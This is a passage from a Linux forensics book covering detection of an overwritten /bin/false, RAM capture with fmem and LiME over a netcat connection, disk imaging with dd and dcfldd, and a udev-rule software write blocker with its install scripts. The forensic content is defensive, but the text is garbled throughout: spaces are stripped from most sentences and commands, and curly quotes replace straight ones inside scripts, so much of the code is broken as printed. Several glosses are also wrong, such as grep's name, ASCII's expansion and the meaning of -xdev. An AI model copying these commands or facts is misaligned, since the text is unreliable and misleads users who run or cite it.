Onceagainweareusingfind inthisscript.Anewoption,-xdev,hasappeared.Thisoption tells find not to follow symbolic links to other filesystems. The commandsha1sum-b{filename}willcomputetheSHA1hashforfilenamewhiletreatingitasabinaryfile.
Partialresultsfromrunningthisscriptagainstthe/bindirectoryonthesubjectmachineareshowninFigure3.8.Thehighlightedlinesshowthat/bin/bashand/bin/falsehavethesame hash value. It would appear that the attacker overwrote /bin/false with /bin/bash.This is likely how system accounts such as lightdm were able to login despite theadministrator’sattemptstodisableloginbysettingtheshellequalto/bin/false.
FIGURE3.8
Some results from running send-sha1sum.sh against the /bin directory of the subject system. The files/bin/bash and /bin/false have the same hash value which indicates the attacker overwrote /bin/false with/bin/bash.
DUMPINGRAMWhatistheperfectwaytocapturearunningsystem?GetacopyofwhatisinRAM.Thisallowsyoutoexactlyrecreatethestateofamachine.Okay,notexactly,butcloseenoughfor our investigative purposes. Some recently released tools such a Volatility makeacquiringRAM images particularly useful.Getting these images today isn’t necessarilyeasy,however.
Manyyears agowhen computers had a gigabyte or less ofRAM itwasvery easy toacquireamemoryimageinLinux.PartofthereasonforthisisthattheLinux“everythingis a file” philosophy also applied toRAM.Thedevice /dev/mem represented all of thephysicalRAM.Thisdevicestillexists today,but it isonlycapableofaccessingthefirst896MBofphysicalRAM.
Virtualmemory(physicalRAMplusmemoryswappedtodisk)wasaccessibleviathe/dev/kmemdevice.Itdidn’ttakeverylongfortheworldwideLinuxcommunitytofigureout that having a userland (non-kernel or privilegedmode) device that could access allmemory was a huge security hole. Today /dev/kmem has been removed. Alternativemeansofcapturingmemoryimagesarenowrequired.
RAMacquisitionmethodsThere are hardware devices for capturingmemory.Memory dumping agents also exist.These agents are part of enterprise security solutions.These twomethods for acquiring
memory images are somewhat expensive and suffer from the fact that theymust be inplacebeforeabreach.Neitherofthesearewidelyused.
Other than the two choices above, if you want to capturememory you will need tocreatesomesortofdevicewhichcanaccessallof thevirtualmemory. Incidentally, thisassumesyoursubjectsystemisnotrunninginsideavirtualmachine.Ifthisisthecaseforyour investigation, consult your virtualization software documentation for instructions.Techniquespresentedherewillworkonbothphysicalandvirtualsystems.
A forensics memory device, fmem, is available for download fromhttp://hysteria.sk/~niekt0/foriana/fmem_current.tgz.Becausethefmemdevice(alongwiththeLiMEdevicetobediscussednext)ishighlydependentonvariouskernelstructures,itmust be built from source using header files from the subjectmachine. Remembermyearlierwarningsconcerningbuildinganythingonthesubjectsystem.
Oncebuiltandinstalledthenewlycreateddevice/dev/fmemworksjustlike/dev/mem,butwithout the limitationsofonlyaccessing the first896MBofRAM.The /dev/fmemdevicecanbeusedtodumpthephysicalRAMand/proc/iomemusedtodeterminewheretofindtheinterestingportions.Usingfmemyouwillendupwitharawmemoryimage.Ascreenshot from the terminalwindow I used to build and install fmemonmy forensicsworkstation is shown in Figure 3.9. Notice that fmem is simple enough that the entirebuildandinstallprocessfitsonasinglescreenincludingtheprintoutofthememoryareasafterinstallation.
FIGURE3.9
Buildingandinstallingfmem.
Issuingthecommandcat/proc/iomemwillprintalonglistofinformation,mostofwhichisuninterestingtotheforensicinvestigator.Ifweusegrep(theGNURegular
ExpressionParser) toextractonly the“SystemRAM”entries from the resultsusing thecommandcat/proc/iomem|grep“SystemRAM”,wewillseewhichrelevantblocks of memory should be captured. The tail of the unfiltered output from cat/proc/iomemand theresultsofpiping this togrep“SystemRAM”areshowninFigure3.10.
FIGURE3.10
Results fromcatting the /proc/iomempseudo file.Unfiltered resultsareshownat the topand theblocksofsystemRAMareshownatthebottom.
Thedd utility can be used to dump the relevant RAM sections to a file. This rawcapture is difficult to use for anything beyond simple searches. The dd program andrelatedutilitieswillbe fullydescribed in thenextchapter (Chapter4:CreatingImages).Thankfully,thereisamucheasierandusefulwaytocollectmemoryimagesthatwewilldiscussnext.
BuildingLiMEThe Linux Memory Extractor (LiME) is the tool of choice for extracting memory onLinux systems for a couple of reasons. First, it is very easy to use. Second, andmoreimportantly, itstoresthecaptureinaformatthat iseasilyreadbytheVolatilitymemoryanalysisframework.
Aswith fmem,LiMEmust be built from source.LiME should be built for the exactkernel version of the subject system, but never on the subject system. If your forensicsworkstation just happens to be the identical version ofUbuntu used by the subject, thecommandsudoapt-getinstalllime-forensics-dkmswilldownloadandbuildLiMEforyou.
For every other situation you must download LiME fromhttps://github.com/504ensicsLabs/LiME using the command git clonehttps://github.com/504ensicsLabs/LiME and compile it with the correctkernelheaders.Ifyourworkstationandthesubjecthavetheexactsamekernel,LiMEisbuiltbysimplychangingtothedirectorywhereLiMEresidesandrunningmakewithnoparameters.ThecompletesetofcommandstodownloadandbuildLiMEforthecurrentkernelareshowninFigure3.11.Noticethateverythingfitsonasinglescreenevenwithmy fat-fingering a few commands (runningmake before changing to the src directory,etc.). Also notice the last line moves (renames) the lime.ko file to lime-<kernelversion>.ko.
FIGURE3.11
DownloadingandbuildingLiMEforthecurrentkernel.Notethatthemodulefileisautomaticallyrenamedtolime-<kernelversion>.kowhenusingthismethod.
Ifthekernelversionsdiffer,thecorrectcommandtobuildLiMEforthesubjectismake-C/lib/modules/<kernelversion>/buildM=$PWD.Note thatwhen youbuildaLiMEmodulethiswaytheoutputfile isnotrenamedwithasuffixfor theexactkernelversion.Istronglyrecommendyoudothisyourselfasitdoesn’ttakelongforyouto end up with a collection of LiME kernel modules on your response drive. ThecommandstobuildandrenameaLiMEmodulethatisnotbuiltforthecurrentkernelareshowninFigure3.12.
FIGURE3.12
Building LiME for other than the current kernel. It is recommended that the lime.ko file be renamed tosomethingmoredescriptiveafteritiscreated.
UsingLiMEtodumpRAMAssumingthatyouhavebuiltLiMEforthecurrentkernelversioninusebyyoursubjectsystemyouarenowreadytouseit.BeforeusingLiMEyoumustmaketwochoices.Thefirst choice is the format for output and the second is a destination for the dump file,whichLiMEcallsapath.
Therearethreeformatchoices:raw,padded,andLiME.Rawformatiseverymemorysegmentconcatenatedtogether.Whenusingtherawformat,areasofmemorycontainingblocksofzerosareskipped.Paddedissimilartoraw,butthezerosareretainedsoyoucanknowthelocationofmemorychunks,notjusttheircontents.
Not surprisingly, the LiME format is the recommended format. This format capturesmemory and stores it in structures complete with metadata. This is the formatrecommended by the authors of the Volatility memory analysis framework. I alsorecommendthisformatasitcontainsthemostinformationforyourlateranalysis.
LiMEsupports twodifferent paths: a file or a networkport. If youhave connected alargecapacityUSBdrivetothesubjectcomputeritisacceptabletostoreyourRAMdumpdirectlytothisfile.Undernocircumstancesshouldthisfilebesavedtothesubject’sharddrive! The network port path is my preferred method for extracting memory images.Whenusingthistechniquealistenerissetuponthesubjectsystem,andnetcatisusedontheforensicsworkstationtoreceivethememorydump.
Thegeneralformatforrunninglimeissudoinsmodlime.ko“path=<path>
format=<format>”.Thiscommandinstalls(orinserts)akernelmodule.Forobviousreasons thiscommand requires rootprivileges.Notice that Ihaveputquotesaround theparameters forLiME.This iswhatyouneed todowithmost versionsofLinux. If thisdoesn’tworkforyoutryremovingthequotes.
TodumptheRAMcopythecorrectLiMEmoduletoyourresponsedriveorothermedia(neverthesubject’sharddisk!).Onthesubjectmachineexecutesudoinsmodlime-<kernelversion>.ko“path=tcp:<portnumber>format=lime”tosetupalistenerthatwilldumpRAMtoanyonethatconnects.NotethatLiMEsupportsotherprotocols suchasUDP,but I recommendyou stickwithTCP. It isn’t abad idea to rununame-abeforeinstallingLiMEtodoublecheckthatyouareusingthecorrectkernelversion.The commands for installingLiMEon the subject system are shown inFigure3.13.
FIGURE3.13
InstallingLiMEonthesubjectsystem.Notethatuname-ahasbeenrunbeforeinstallingLiMEtoremindtheinvestigatorwhichversionofLiMEshouldbeused.
On the forensics workstation running nc {subject IP} {port used byLiME}>{filename}, i.e.nc 192.168.56.101 8888 > ram.lime, willconnecttotheLiMElistenerandsendaRAMdumpoverthenetwork.Oncethedumphasbeen sent LiME uninstalls the module from the subject system. The beginning of thereceived RAM dump is shown in Figure 3.14. Note that the file header is “EMiL” orLiMEspelledbackwards.
FIGURE3.14
TheRAMdumpfileinLiMEformat.Notethattheheaderis“EMiL”orLiMEspelledbackwards.
SUMMARYIn this chapter we have discussed multiple techniques that can be used to gatherinformationfromasystemwithouttakingitoffline.Thisincludedcollectinganimageofsystemmemoryforlaterofflineanalysis.Analyzingthisimagewillbebediscussedlaterinthisbook(Chapter8:MemoryAnalysis).Inthenextchapterwewillturnourattentiontotraditionaldeadanalysiswhichrequiresustoshutdownthesubjectsystem.
CHAPTER
4CreatingImagesINFORMATIONINTHISCHAPTER:
ShuttingdownthesystemImageformatsUsingddUsingdcflddHardwarewriteblockingSoftwarewriteblockingUdevrulesLiveLinuxdistributionsCreatinganimagefromavirtualmachineCreatinganimagefromaphysicaldrive
SHUTTINGDOWNTHESYSTEMWearefinallyreadytostartthetraditionaldeadanalysisprocess.WehavenowprogressedtothenextblockinourhighlevelprocessasshowninFigure4.1.Ifsometimehaspassedsince you performed your initial scans and live analysis captures described in theproceedingchapters,youmaywishtoconsiderrerunningsomeorallofthescripts.
FIGURE4.1
Highlevelforensicincidentresponseprocess.
Asyouprepare toshutdownthesystemfor imagingyouarefacedwithadecisiontoperformanormalshutdownortopulltheplug.Aswithmanythingsinforensics,thereisnotonerightanswertothisquestionforeverysituation.Theinvestigatormustweightheplusesandminusesforeachoption.
NormalshutdownAnormalshutdownshould,intheory,leaveyouwithacleanfilesystem.This,ofcourse,assumesthatthisispossiblewithasysteminfectedwithmalware.Ihavefoundthatsomerootkitspreventanormalshutdown.Thebiggestreasonnottouseanormalshutdownisthat somemalwaremight clean up after itself, destroy evidence, or evenworse destroyother information on the system. With the modern journaling filesystems likely to befoundonthesubjectsystem,acleanfilesystemisnotascrucialasitwasmanyyearsago.
PullingtheplugIf we simply cut power to the subject system the filesystem(s) may not be clean. Aspreviously mentioned, this is not necessarily as serious as it was before journalingfilesystems became commonplace. One thing you can do to minimize the chances ofdealing with a filesystem that is extremely dirty (lots of file operations waiting in thecache)istorunthesynccommandbeforepullingtheplug.Thereisalwaysachancethatanattackerhasalteredthesyncprogram,butintherareinstanceswheretheyhavedonesoyourliveanalysiswouldlikelyhaverevealedthis.
Thebestthingthismethodhasgoingforitisthatmalwaredoesn’thaveanychancetoreact.Giventheinformationcollectedbyrunningyourscriptsduringtheliveanalysisandmemoryimageyouhavedumped,youarenotlikelytolosemuchifanyinformationbypullingtheplug.Ifyoususpectamalwareinfectionthisisyourbestoptioninmostcases.
IMAGEFORMATSAswiththememoryimages,therearechoicesofformatsforstoringfilesystemimages.Atabasiclevelyoumustdecidebetweenarawformatandaproprietaryformat.Withinthesechoicestherearestillsubchoicestobemade.
RawformatTherawformatisnothingmorethanasetofbytesstoredinthesamelogicalorderastheyare found on disk. Nearly every media you are likely to encounter utilizes 512 bytesectors.WhereasolderdevicesformattedwithWindowsfilesystems(primarilyFAT12andFAT16)mayusecylinders,heads,andsectorstoaddressthesesectors,theLinuxforensicsinvestigator is much more fortunate in that media he or she encounters will almostcertainlyuseLogicalBlockAddressing(LBA).
OnmediawhereLBAisusedsectorsarenumberedlogicallyfrom0to({mediasizeinbytes} / 512 -1). The sectors are labeled LBA0, LBA1, etc. It is important tounderstanding that this logicaladdressing isdone transparentlyby themediadeviceandthereforedeterministic (doesn’tdependonwhichoperating system reads the filesystem,
etc.).A raw image is nothingmore than a large filewith LBA0 in the first 512 bytes,followedbyLBA1inthenext512bytes,andsoon.
Becausetherawformatisessentiallyidenticaltowhatisstoredonthemedia,therearenumerousstandardtoolsthatcanbeusedtomanipulatethem.Forthisandotherreasonstherawformatisverypopularandsupportedbyeveryforensicstool.Becauserawimagesarethesamesizeasthemediatheyrepresent,theytendtobequitelarge.
Some investigators like to compress raw images. Indeed, some forensics tools canoperateoncompressedrawimages.Onethingtokeepinmindshouldyouchoosetoworkwithcompressedimagesisthatitlimitsyourtoolselection.Itwillalsolikelyresultinaperformancepenaltyformanycommonforensicstaskssuchassearching.
ProprietaryformatwithembeddedmetadataEnCase is a widely used proprietary forensics tool. It is especially popular amongexaminers thatfocusonWindowssystems.TheEnCasefileformatconsistsofaheader,therawsectorswithchecksumsevery32kilobytes(64standardsectors),andafooter.Theheader contains metadata such as the examiner, acquisition date, etc. and ends with achecksum.ThefooterhasanMD5checksumforthemediaimage.
TheEnCasefileformatsupportscompression.Compression isdoneat theblock levelwhichmakessearchingalittlefasterthanitwouldbeotherwise.Thereasonforthisisthatmostsearchesareperformedforcertaintypesoffilesandfileheadersatthebeginningofblocks(sectors)areusedtodeterminefiletype.
ProprietaryformatwithmetadatainaseparatefileHalfwaybetweentherawformatandsomesortofproprietaryformatistheuseofmultiplefilestostoreanimage.Typicallyonefileisarawimageandtheotherstoresmetadatainaproprietaryway.Anumberofimagingtoolsmakethischoice.
RawformatwithhashesstoredinaseparatefileInmyopinion,thebestoptionistoacquireimagesintherawformatwithhashesstoredseparately.Thisallows the image tobeusedwitheveryforensicspackageavailableandaddsstandardLinuxsystemtoolstoyourtoolbox.Thehashesallowyoutoprovethatyouhavemaintainedtheintegrityoftheimageduringtheinvestigation.
In a perfectworld youwould create an image of a disk and calculate a hash for theentireimageandthatwouldbetheendofit.Wedon’tliveinaperfectworld,however.Asa result, I recommend that you hash chunks of the image in addition to calculating anoverallhash.
There are a couple of reasons for this recommendation. First, it is a good idea toperiodicallyrecalculatethehashesasyouworktoverifyyouhavenotchangedanimage.If the image is large, computing the overall hash might be time consuming whencomparedtohashingasmallchunk.Second,youmayencountermediathatisdamaged.Certain areasmaynot read the same every time. It ismuchbetter to discard data from
these damaged areas than to throw out an entire disk image if the hash doesn’tmatch.Fortunatelysomeofthetoolstobediscussedinthischapterdothishashingforyou.
USINGDDAll Linux systems ship with a bit-moving program known as dd. This utility predatesLinuxbyseveralyears.ItsoriginalusewasforconvertingtoandfromASCII(AmericanSymbolic Code for Information Interchange) and EBCDIC (Extended Binary CodedDecimal Interchange Code). For those unfamiliar with EBCDIC, it was an encodingprimarilyusedbyIBMmainframes.
Inadditiontoitsconversioncapabilities,ddisusedforpushingdatafromoneplacetoanother.Dataiscopiedinblocks,withadefaultblocksizeof512bytes.Themostbasicuseofddisddif=<inputfile>of=<outputfile>bs=<blocksize>.InLinux,whereeverything isa file, if the input file representsadevice, theoutput filewillbearawimage.
Forexample,ddif=/dev/sdaof=sda.imgbs=512willcreatearawimageofthefirstdriveonasystem.Ishouldpointoutthatyoucanalsoimagepartitionsseparatelybyusingadevicefilethatcorrespondstoasinglepartitionsuchas/dev/sda1,/dev/sdb2,etc.Irecommendthatyouimagetheentirediskasaunit,however,unlessthereissomereason(suchaslackofspacetostoretheimage)thatpreventsthis.
Thereare a few reasonswhy I recommend imaging theentiredrive if at all possible.First, it becomes much simpler to mount multiple partitions all at once using scriptspresented later in this book. Second, any string searches can be performed againsteverythingyouhavecollected,includingswapspace.Finally,therecouldbedatahiddeninunallocatedspace(notpartofanypartition).
Doesblocksizematter?Intheoryitdoesn’tmatterasddwillfaithfullycopyanypartialblocksso that the inputandoutput filesare thesamesize(assumingnoconversionsareperformed).Thedefaultblocksizeis512bytes.Optimumperformanceisachievedwhentheblocksizeisanevenmultipleofthebytesreadatatimefromtheinputfile.
Asmostdeviceshave512byteblocks,anymultipleof512willimproveperformanceattheexpenseofusingmorememory.Inthetypicalscenario(describedlaterinthischapter)wherean image isbeingcreatedfrommediaremovedfromthesubjectsystem,memoryfootprint isnot a concernandablock sizeof4kilobytesormore is safelyused.Blocksizesmaybedirectlyenteredinbytesorasmultiplesof512bytes,kilobytes(1024bytes),megabytes(1024*1024bytes)usingthesymbolsb,k,andM,respectively.Forexample,a4kilobyteblocksizecanbewrittenas4096,8b,or4k.
There is one last thing I should mention before moving on to another tool. Whathappenswhenthereisanerror?Thedefaultbehaviorisforddtofail.Thiscanbechangedbyadding theoptionconv=noerror,sync to thedd command.Whena readerroroccurs,any bad bytes will be replaced with zeros in order to synchronize the position ofeverythingbetweentheinputandoutputfiles.
USINGDCFLDDThe United States Department of Defense Computer Forensics Lab developed anenhancedversionofddknownasdcfldd.This tool adds several forensics features todd.Oneof themost important features is theability tocalculatehasheson the fly.Thecalculatedhashesmaybesenttoafile,displayedinaterminal(default),orboth.
Inadditiontocalculatinganoverallhash,dcflddcancomputehashesforchunksofdata (which it callswindows).Asof thiswriting,dcfldd supports the followinghashalgorithms:MD5,SHA1,SHA256,SHA384,andSHA512.Multiplehashalgorithmsmaybeusedsimultaneouslywithhasheswrittentoseparatefiles.
Thegeneralformatforusingdcflddtocreateanimagewithhashesinaseparatefileisdcflddif=<subjectdevice>of=<imagefile>bs=<blocksize>hash=<algorithm>hashwindow=<chunksize>hashlog=<hashfile>conv=noerror,sync.Forexample,tocreateanimageofthesecondharddriveonasystem with SHA256 hashes calculated every 1GB the correct command would bedcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256hashwindow=1G hashlog =sdb.hashes conv=noerror,sync. If youwantedtocalculatebothSHA256andMD5hashesforsomereasonthecommandwouldbe dcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256,md5hashwindow=1G sha256log=sdb.sha256hashesmd5log=sdb.md5hashesconv=noerror,sync.
HARDWAREWRITEBLOCKINGYoushouldhavesomemeansofassuringthatyouarenotalteringthesubject’sharddrivesand/or other media when creating images. The traditional way to do this is to use ahardwarewriteblocker.Inmanycaseshardwarewriteblockersareprotocol(SATA,IDE,SCSI,etc.)specific.
Hardwarewriteblockerstendtobealittlepricey.AcheapermodelmightcostupwardsofUS$350.Becausetheyareexpensive,youmightnotbeabletoaffordasetofblockersfor all possible protocols. If you can only afford one blocker I recommend you buy aSATA unit as that is by far what the majority of systems will be using. A relativelyinexpensive blocker is shown in Figure 4.2. If you find yourself doing a lot of LinuxresponseindatacentersaSCSIunitmightbeagoodchoiceforasecondblocker.
FIGURE4.2
ATableauSATAwriteblocker.
Thereareafewcheaperopen-sourceoptionsavailable,buttheytendtohavelimitations.One such option is a microcontroller-based USBwrite blocker which I developed anddescribed in a course on USB forensics at PentesterAcademy.com(http://www.pentesteracademy.com/course?id=16). I do not recommend the use of this
deviceforlargemedia,however,asitislimitedtoUSB2.0fullspeed(12Mbps).Imayportthiscodetoanewmicrocontrollerthatiscapableofhigherspeeds(atleast480Mbps)atsomepoint,butforthemomentIrecommendtheUdevrulesmethoddescribedlaterinthischapter.
SOFTWAREWRITEBLOCKINGJustashardwareroutersarereallyjustprettyboxesrunningsoftwarerouters(usuallyonLinux),hardwarewriteblockersarealmostalwayssmallcomputerdevicesrunningwriteblockingsoftware.ThereareseveralcommercialoptionsforWindowssystems.Naturally,mostoftheLinuxchoicesarefreeandopensource.
Thereisakernelpatchavailabletomountblockdevicesautomatically.Youcanalsosetsomething up in your favorite scripting language.Next Iwill describe a simpleway toblockanythingconnectedviaUSBusingudevrules.
UdevrulesUdevrulesarethenewwaytocontrolhowdevicesarehandledonLinuxsystems.Usingthe udev rules presented below, a “magic USB hub” can be created that automaticallymountsanyblockdeviceconnecteddownstreamfromthehubasread-only.
Linux systems shipwith a set of standard udev rules.Administratorsmay customizetheir systems by adding their own rules to the /etc/udev/rules.d directory. Like manysystem scripts (i.e. startup scripts), the order in which these rules are executed isdeterminedbythefilename.Standardpracticeistostartthefilenamewithanumberwhichdetermineswhenitisloaded.
Whentherulesintherulesfilebelowarerun,alloftheinformationrequiredtomountafilesystemisnotyetavailable.Forthisreason,therulesgeneratescriptswhichcallotherscriptsintwostages.Thefileshouldbenamed/etc/udev/rules.d/10-protectedmount.rules.Notethatthevendorandproductidentifierswillbesetwithaninstallscripttomatchyourhub.Thisinstallscriptispresentedlaterinthischapter.ACTION==”add”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”1a40”,ATTRS{idProduct}==”0101”,ENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”,RUN+=”/etc/udev/scripts/protmount.sh%k%n”
ACTION==”remove”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”1a40”,ATTRS{idProduct}==”0101”,ENV{PHIL_UNMOUNT}=”1”,RUN+=”/etc/udev/scripts/protmount3.sh%k%n”
ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2-%n.sh”
ENV{PHIL_MOUNT}!=”1”,ENV{UDISKS_PRESENTATION_HIDE}=”0”,ENV{UDISKS_AUTOMOUNT_HINT}=”always”
ENV{PHIL_UNMOUNT}==”1”,RUN+=”/etc/udev/scripts/protmount4-%n.sh”
Thegeneralformatfor theserulesisaseriesofstatementsseparatedbycommas.Thefirststatements,thosewithdoubleequals(“==”),arematchingstatements.Ifalloftheseare matched, the remaining statements are run. These statements primarily set
environmentvariablesandaddscriptstoalistofthosetoberun.Anysuchscriptsshouldrunquicklyinordertoavoidboggingdownthesystem.
The first rule canbe broken intomatching statements and statements to be executed.The matching statements are ACTION==”add”, SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”, ATTRS{idVendor}==”1a40”,ATTRS{idProduct}==”0101”. This matches when a new device is added; it is ablockdevice;itisnamed/dev/sdXn(whereXisaletterandnisapartitionnumber),anditsoraparents’USBvendorandproduct IDmatch thosespecified. Ifyouonlywant tomatch the current device’s attribute and not the parent’s, use ATTR{attributeName}instead of ATTRS{attributeName}. By using ATTRS we are assured the rule will bematchedbyeverydeviceattacheddownstreamfromthehub.
Thepartof thefirstrulecontainingcommandstorunisENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”, RUN+=”/etc/udev/scripts/protmount.sh %k%n” . These statements set an environment variable PHIL_MOUNT equal to 1, setanotherenvironmentvariablePHIL_DEVtothekernelnamefor thedevice(sda3,sdb1,etc.), andappends /etc/udev/scripts/protmount.sh to the listof scripts tobe runwith thekernelnameforthedeviceandpartitionnumberpassedinasparameters.
Thesecondruleisverysimilartothefirst,butitmatcheswhenthedeviceisremoved.Itsets an environment variable PHIL_UNMOUNT to 1 and adds/etc/udev/scripts/protmount3.shtothelistofscriptstoberun(thekerneldevicenameandpartition number are again passed in as parameters). The protmount3.sh andprotmount4.shscriptsareusedtocleanupafterthedeviceisremoved.
The next rule ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2.sh” is run later just before theoperating system attempts to mount the filesystem. If the PHIL_MOUNT variable hasbeenset,we tell theoperatingsystem tohide thenormaldialog that isdisplayed,neverautomount the filesystem (because it wouldn’t be mounted read-only), and add theprotmount2.shscript tothelistof thingstobeexecuted.IfPHIL_MOUNThasnotbeensetto1,wesetuptheoperatingsystemtohandlethedevicethestandardway.Thelastrulecausesprotmount4.shtorunifthePHIL_UNMOUNTvariablehasbeenset.
We will now turn our attention to the scripts. Two of the scripts protmount.sh andprotmount3.sh are used to create the other two protmount2.sh and protmount4.sh,respectively.As previouslymentioned, the reason for this is that all of the informationneeded toproperlymountandunmount thefilesystemisnotavailableat thesame time.Theprotmount.shscriptfollows.#!/bin/bash
echo“#!/bin/bash”>“/etc/udev/scripts/protmount2-$2.sh”
echo“mkdir/media/$1”>>“/etc/udev/scripts/protmount2-$2.sh”
echo“chmod777/media/$1”>>“/etc/udev/scripts/protmount2-$2.sh”
echo“/bin/mount/dev/$1-oro,noatime/media/$1”>>“/etc/udev/scripts/protmount2-$2.sh”
chmod+x“/etc/udev/scripts/protmount2-$2.sh”
This script echoesa seriesof commands to thenewscript.The first line includes thefamiliarshe-bang.Thesecondlinecreatesadirectory, /media/{kerneldevicename}(i.e./media/sdb2). The third line opens up the permissions on the directory. The fourth linemounts the filesystem as read-only with no access time updating in the newly createddirectory.Thefinallineinthescriptmakestheprotmount2.shscriptexecutable.
Theprotmount3.shscriptissimilarexceptthatitcreatesacleanupscript.Thecleanupscriptisprotmount4.sh.Theprotmount3.shscriptfollows.#!/bin/bash
echo“#!/bin/bash”>“/etc/udev/scripts/protmount4-$2.sh”
echo“/bin/umount/dev/$1”>>“/etc/udev/scripts/protmount4-$2.sh”
echo“rmdir/media/$1”>>“/etc/udev/scripts/protmount4-$2.sh”
chmod+x“/etc/udev/scripts/protmount4-$2.sh”
An installation script has been created for installing this system. This script takes avendorandproductIDasrequiredparameters.ItalsotakesanoptionalsecondproductID.Youmight be curious as to why this is in the script. If you are using a USB 3.0 hub(recommended) it actuallypresents itself as twodevices,one is aUSB2.0huband theother is aUSB3.0hub.These twodeviceswillhavea commonvendor ID,butuniqueproductIDs.#!/bin/bash
#
#Installscriptfor4deckaddonto“TheDeck”
#ThisscriptwillinstalludevruleswhichwillturnaUSBhub
#intoamagichub.Everyblockdeviceconnectedtothemagichub
#willbeautomaticallymountedunderthe/mediadirectoryasreadonly.
#Whilethiswasdesignedtoworkwith“TheDeck”itwillmostlikely
#workwithmostmodernLinuxdistros.Thissoftwareisprovidedasis
#withoutwarrantyofanykind,expressorimplied.Useatyourown
#risk.Theauthorisnotresponsibleforanythingthathappensas
#aresultofusingthissoftware.
#
#InitialversioncreatedAugust2012byDr.PhilPolstra,Sr.
#Version1.1createdMarch2015
#newversionsaddssupportforasecondPIDwhichisrequired
#whenusingUSB3.0hubsastheyactuallypresentastwohubs
unsetVID
unsetPID
unsetPID2
functionusage{
echo“usage:sudo$(basename$0)—vid05e3—pid0608[—pid20610]”
cat<<EOF
Bugsemail:“DrPhilatpolstra.org”
RequiredParameters:
—vid<VendorIDofUSBhub>
—pid<ProductIDofUSBhub>
OptionalParameters:
—pid2<SecondProductIDofUSB3.0hub>
EOF
exit
}
functioncreateRule{
cat>/etc/udev/rules.d/10-protectedmount.rules<<-__EOF__
ACTION==”add”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID}”,ENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”,RUN+=”/etc/udev/scripts/protmount.sh%k%n”
ACTION==”remove”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID}”,ENV{PHIL_UNMOUNT}=”1”,RUN+=”/etc/udev/scripts/protmount3.sh%k%n”
ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2-%n.sh”
ENV{PHIL_MOUNT}!=”1”,ENV{UDISKS_PRESENTATION_HIDE}=”0”,ENV{UDISKS_AUTOMOUNT_HINT}=”always”
ENV{PHIL_UNMOUNT}==”1”,RUN+=”/etc/udev/scripts/protmount4-%n.sh”
__EOF__
if[!“$PID2”=“”];then
cat>>/etc/udev/rules.d/10-protectedmount.rules<<-__EOF__
ACTION==”add”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID2}”,ENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”,RUN+=”/etc/udev/scripts/protmount.sh%k%n”
ACTION==”remove”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID2}”,ENV{PHIL_UNMOUNT}=”1”,RUN+=”/etc/udev/scripts/protmount3.sh%k%n”
ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2-%n.sh”
ENV{PHIL_MOUNT}!=”1”,ENV{UDISKS_PRESENTATION_HIDE}=”0”,ENV{UDISKS_AUTOMOUNT_HINT}=”always”
ENV{PHIL_UNMOUNT}==”1”,RUN+=”/etc/udev/scripts/protmount4-%n.sh”
__EOF__
fi
}
functioncopyScripts{
if[!-d“/etc/udev/scripts”];then
mkdir/etc/udev/scripts
fi
cp./protmount*.sh/etc/udev/scripts/.
}
#parsecommandlineoptions
while[!-z“$1”];do
case$1in
-h|—help)
usage
;;
—vid)
VID=”$2”
;;
—pid)
PID=”$2”
;;
—pid2)
PID2=”$2”
;;
esac
shift#consumecommandlinearguments1atatime
done
#nowactuallydosomething
createRule
copyScripts
The script is straightforward. It begins with the usual she-bang, then a couple ofenvironmentvariablesareunset.Weseeatypicalusagefunction,thenafewfunctionsaredefined for creatingandcopying files.Finally, these functions are runat the endof thescript.
LiveLinuxdistributionsThepreferredmethodofcreatinganimageofaharddriveistoremoveitfromthesubjectsystem.This isnotalwayspractical,however.Forexample,somelaptops(includingtheone I am currently using towrite this book)must be disassembled to remove the harddrive as they lack access panels for this purpose. Booting a live Linux distribution inforensicsmodecanbetheeasiestoptionforthesetypesofsituations.
There are a couple of options available.Most any liveLinuxwillwork, but it neverhurtstouseaforensics-orienteddistributionlikeSIFT.YoucaneitherinstallittoitsownUSBdriveoruse thesameUSBdrive thatyouuse foryourknown-goodbinaries.As Isaid earlier in this book, if youdo this youwill need to format thedrivewithmultiplepartitions.ThefirstmustbeFATinorderforittoboot,andthepartitionwiththebinaries
mustbeformatedasext2,ext3,orext4topreservepermissions.
TherearesomethatliketousealiveLinuxdistributionontheforensicsworkstation.Irecommendagainstdoingthis.Myprimaryobjectiontodoingthisisthattheperformanceisalways relativelypoorwhenrunninga liveLinuxdistribution,aseverything is run inRAM. If you are just running the live Linux distribution for the write blocking, Irecommendyoujustusemyudevrules-basedblockingdescribedearlierinthischapter.
